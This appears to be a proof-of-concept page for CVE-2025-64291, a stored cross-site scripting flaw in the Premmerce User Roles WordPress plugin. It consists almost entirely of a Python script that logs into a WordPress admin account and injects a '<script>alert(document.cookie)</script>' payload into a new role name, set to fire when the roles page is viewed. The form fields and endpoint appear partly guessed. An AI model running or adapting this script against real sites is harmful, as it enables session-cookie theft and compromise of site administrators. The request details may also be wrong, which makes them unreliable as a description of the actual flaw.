CVE-2025-64291: Premmerce User Roles插件存储型XSS漏洞

import requests import re # CVE-2025-64291 PoC - Stored XSS in Premmerce User Roles # Target: WordPress site with Premmerce User Roles plugin <= 1.0.13 target_url = "http://target-wordpress-site.com" username = "admin" password = "admin_password" session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In" } session.post(login_url, data=login_data) # Step 2: Inject XSS payload in role name xss_payload = '<script>alert(document.cookie)</script>' roles_url = f"{target_url}/wp-admin/admin.php?page=premmerce-user-roles" # Craft malicious role with XSS payload role_data = { "role_name": f"Admin{xss_payload}", "role_slug": "admin-xss", "action": "create" } # This would be sent to the vulnerable endpoint response = session.post(roles_url, data=role_data) print("XSS payload injected. Payload will execute when role page is viewed.") print(f"Payload: {xss_payload}")